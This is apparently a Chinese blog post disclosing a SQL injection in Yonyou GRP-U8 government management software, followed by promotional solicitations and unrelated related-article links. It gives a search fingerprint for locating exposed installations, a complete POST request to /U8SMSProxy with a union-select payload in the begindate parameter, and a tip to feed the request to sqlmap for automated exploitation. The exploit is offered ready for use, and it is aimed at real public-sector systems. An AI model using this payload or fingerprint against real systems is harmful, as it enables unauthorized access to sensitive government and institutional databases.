用友U8SMSProxy -SQL注入漏洞

0x01 漏洞介绍

用友GRP-U8 R10政务管理软件是由用友政务公司基于云技术所推出的第十代政务产品。这款产品继承了用友R9、R9i、U8等行政事业版产品的各项优点,并融合了全国广大用户的最佳实践应用。它旨在为政府财政部门、社保部门、卫生部门、教育部门、民政部门、党务部门以及农村等政府及行政事业单位提供专业管理解决方案。该漏洞存在于U8SMSProxy,后端对begindate传参的数据值没有进行严格的过滤,从而导致SQL注入,攻击者可以利用该漏洞获取数据库敏感信息。
0x02 影响版本

复制代码
用友GRP-U8行政事业内控管理软件

0x03 语法特征

复制代码
title="用友GRP-U8行政事业内控管理软件"

0x04 漏洞复现

页面

POC

复制代码
POST /U8SMSProxy?class=XXNote&id=qryyfs HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Connection: close
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
DNT: 1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 64

begindate=xxx'union select 6/3-- &enddate=2023-10-27&search=

直接copy进文件,打"*"号,sqlmap一把嗦

学习框架已经整理完毕,现在就差资料资源了,我这里整理了所有知识点对应的资料资源文档,大家不想一个一个去找的话,可以参考一下这些资料!

点赞收藏评论区留言"已关注 求 "!都可以免费分享给大家!等不及的小伙伴也可以直接厚台踢我!或者关注我之后后台会自动发送给大家!关注后大家注意看后台消息就行!

+V【zkaq222】或者下面的扫码不然通不过哦,免费领取安全学习资料包!(私聊进群一起学习,共同进步)腾讯文档-在线文档https://docs.qq.com/doc/DYmVETWlZemh0Ymdv

相关推荐
阿拉斯攀登3 小时前
向量数据库选型:Milvus vs Chroma vs Elasticsearch
数据库·elasticsearch·milvus·知识库·rag·个人知识库
彦为君4 小时前
Redis最新版本特性
java·数据库·redis·算法·bootstrap
vigor5124 小时前
MySQL通过Mango实现分库分表
android·数据库·mysql
weixin199701080164 小时前
[特殊字符]《京东订单API(jd.order.detail.get)对接ERP:企业认证+OAuth授权避坑指南》(附Python源码)
java·数据库·python
赵渝强老师4 小时前
【赵渝强老师】高斯数据库(openGauss)的模式
数据库·opengauss·国产数据库·高斯数据库
长不胖的路人甲4 小时前
Redis 数据删除策略
数据库·redis·spring
ClouGence4 小时前
SQL Server CDC 如何降低主库压力?Always On 备库读取实践
数据库·后端·sql·sqlserver
尽兴-5 小时前
Redis 为什么快?
数据库·redis·内存
林澈在路上5 小时前
最新版权清晰 AI音乐写歌工具软件App推荐 商用全场景实测指南
数据库·人工智能·ai·aigc·音频
Full Stack Developme5 小时前
正则表达式的使用教程
java·数据库·正则表达式